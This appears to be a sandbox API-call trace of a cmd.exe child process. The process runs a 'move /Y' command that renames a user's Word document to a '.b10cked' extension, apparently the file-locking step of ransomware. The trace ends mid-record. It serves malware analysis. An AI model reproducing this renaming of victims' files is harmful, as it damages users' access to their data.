1 [0136.327] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.327] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.330] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.331] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.331] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.333] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.333] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.363] GetEnvironmentStringsW () returned 0x370178* [0136.363] FreeEnvironmentStringsW (penv=0x370178) returned 1 [0136.364] GetEnvironmentStringsW () returned 0x370178* [0136.364] FreeEnvironmentStringsW (penv=0x370178) returned 1 [0136.364] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea2c | out: phkResult=0x2cea2c*=0x40) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0xa0, lpcbData=0x2cea30*=0x1000) returned 0x2 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x1, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x1, lpcbData=0x2cea30*=0x1000) returned 0x2 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x0, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x40, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x40, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x40, lpcbData=0x2cea30*=0x1000) returned 0x2 [0136.364] RegCloseKey (hKey=0x40) returned 0x0 [0136.364] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea2c | out: phkResult=0x2cea2c*=0x40) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x40, lpcbData=0x2cea30*=0x1000) returned 0x2 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x1, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x1, lpcbData=0x2cea30*=0x1000) returned 0x2 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x0, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x9, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x9, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x9, lpcbData=0x2cea30*=0x1000) returned 0x2 [0136.364] RegCloseKey (hKey=0x40) returned 0x0 [0136.365] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.365] srand (_Seed=0x5b88636a) [0136.365] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked\"" [0136.365] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked\"" [0136.365] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.365] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3718d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.365] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.365] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.365] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.365] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.365] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.365] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.365] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.365] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.366] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.366] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.366] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.366] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.366] GetEnvironmentStringsW () returned 0x3722c8* [0136.366] FreeEnvironmentStringsW (penv=0x3722c8) returned 1 [0136.366] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.366] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.366] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.366] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.366] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.366] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.366] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.366] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.366] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.366] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.366] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf7f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.366] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf7f8, lpFilePart=0x2cf7f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf7f4*="Desktop") returned 0x18 [0136.366] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.366] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf574 | out: lpFindFileData=0x2cf574) returned 0x370008 [0136.367] FindClose (in: hFindFile=0x370008 | out: hFindFile=0x370008) returned 1 [0136.367] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf574 | out: lpFindFileData=0x2cf574) returned 0x370008 [0136.367] FindClose (in: hFindFile=0x370008 | out: hFindFile=0x370008) returned 1 [0136.367] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf574 | out: lpFindFileData=0x2cf574) returned 0x370008 [0136.367] FindClose (in: hFindFile=0x370008 | out: hFindFile=0x370008) returned 1 [0136.367] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.367] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.367] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.367] GetEnvironmentStringsW () returned 0x372ae8* [0136.368] FreeEnvironmentStringsW (penv=0x372ae8) returned 1 [0136.368] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.368] GetConsoleOutputCP () returned 0x1b5 [0136.370] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.370] GetUserDefaultLCID () returned 0x409 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf938, cchData=128 | out: lpLCData="0") returned 2 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf938, cchData=128 | out: lpLCData="0") returned 2 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf938, cchData=128 | out: lpLCData="1") returned 2 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.382] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.383] GetConsoleTitleW (in: lpConsoleTitle=0x3608d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.412] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.412] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.412] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.412] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.413] _wcsicmp (_String1="move", _String2=")") returned 68 [0136.413] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0136.413] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0136.413] _wcsicmp (_String1="IF", _String2="move") returned -4 [0136.413] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0136.413] _wcsicmp (_String1="REM", _String2="move") returned 5 [0136.413] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0136.415] GetConsoleTitleW (in: lpConsoleTitle=0x2cf630, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.454] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0136.454] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0136.454] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0136.454] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0136.454] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0136.454] _wcsicmp (_String1="move", _String2="CD") returned 10 [0136.454] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0136.454] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0136.454] _wcsicmp (_String1="move", _String2="REN") returned -5 [0136.454] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0136.454] _wcsicmp (_String1="move", _String2="SET") returned -6 [0136.454] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0136.454] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0136.454] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0136.454] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0136.454] _wcsicmp (_String1="move", _String2="MD") returned 11 [0136.454] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0136.454] _wcsicmp (_String1="move", _String2="RD") returned -5 [0136.454] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0136.454] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0136.454] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0136.454] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0136.454] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0136.454] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0136.454] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0136.454] _wcsicmp (_String1="move", _String2="VER") returned -9 [0136.454] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0136.454] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0136.454] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0136.454] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0136.454] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0136.454] _wcsicmp (_String1="move", _String2="START") returned -6 [0136.454] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0136.454] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0136.454] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0136.456] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.456] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.456] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf3ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf3e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf3e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.457] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0136.457] _wcsicmp (_String1="ERN4JQ~1.DOC", _String2=".") returned 55 [0136.457] _wcsicmp (_String1="ERN4JQ~1.DOC", _String2="..") returned 55 [0136.457] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\ern4jq~1.doc")) returned 0x20 [0136.457] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x371e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.457] SetErrorMode (uMode=0x0) returned 0x0 [0136.457] SetErrorMode (uMode=0x1) returned 0x0 [0136.458] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC", nBufferLength=0x104, lpBuffer=0x2ced74, lpFilePart=0x2ced5c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC", lpFilePart=0x2ced5c*="ERN4JQ~1.DOC") returned 0x26 [0136.458] SetErrorMode (uMode=0x0) returned 0x1 [0136.458] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0136.458] _wcsicmp (_String1="ERN4JQ~1.DOC", _String2=".") returned 55 [0136.458] _wcsicmp (_String1="ERN4JQ~1.DOC", _String2="..") returned 55 [0136.458] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\ern4jq~1.doc")) returned 0x20 [0136.458] SetErrorMode (uMode=0x0) returned 0x0 [0136.458] SetErrorMode (uMode=0x1) returned 0x0 [0136.458] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC", nBufferLength=0x104, lpBuffer=0x2cf1f0, lpFilePart=0x2cef88 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC", lpFilePart=0x2cef88*="ERN4JQ~1.DOC") returned 0x26 [0136.458] SetErrorMode (uMode=0x0) returned 0x1 [0136.458] SetErrorMode (uMode=0x0) returned 0x0 [0136.458] SetErrorMode (uMode=0x1) returned 0x0 [0136.458] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked", nBufferLength=0x104, lpBuffer=0x2cf3f8, lpFilePart=0x2cef88 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked", lpFilePart=0x2cef88*="ERN4JQpRpgZde9N.docx.b10cked") returned 0x36 [0136.458] SetErrorMode (uMode=0x0) returned 0x1 [0136.458] SetLastError (dwErrCode=0x0) [0136.458] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\ern4jqprpgzde9n.docx.b10cked")) returned 0xffffffff [0136.458] GetLastError () returned 0x2 [0136.458] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x2ce904, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce904) returned 0x360e50 [0136.458] FindNextFileW (in: hFindFile=0x360e50, lpFindFileData=0x2ce904 | out: lpFindFileData=0x2ce904) returned 0 [0136.459] GetLastError () returned 0x12 [0136.459] FindClose (in: hFindFile=0x360e50 | out: hFindFile=0x360e50) returned 1 [0136.460] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x371bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x371bd0) returned 0x360e50 [0136.460] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked", nBufferLength=0x104, lpBuffer=0x2ceb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked", lpFilePart=0x0) returned 0x36 [0136.460] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx", nBufferLength=0x104, lpBuffer=0x2ceb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx", lpFilePart=0x0) returned 0x2e [0136.460] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\ern4jqprpgzde9n.docx")) returned 0x20 [0136.460] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\ern4jqprpgzde9n.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\ern4jqprpgzde9n.docx.b10cked"), dwFlags=0x3) returned 1 [0136.460] FindClose (in: hFindFile=0x360e50 | out: hFindFile=0x360e50) returned 1 [0136.461] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ceb50 | out: _Buffer=" 1") returned 9 [0136.461] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.461] GetFileType (hFile=0x7) returned 0x2 [0136.659] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.659] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceadc | out: lpMode=0x2ceadc) returned 1 [0136.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.659] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ceb10 | out: lpConsoleScreenBufferInfo=0x2ceb10) returned 1 [0136.659] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.659] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ceb50 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.659] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ceb34, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ceb34*=0x1a) returned 1 [0136.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.659] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.660] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.660] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.660] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.660] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.660] SetConsoleInputExeNameW () returned 0x1 [0136.660] GetConsoleOutputCP () returned 0x1b5 [0136.660] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.660] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.660] exit (_Code=0) Process: id = "139" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0xc38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 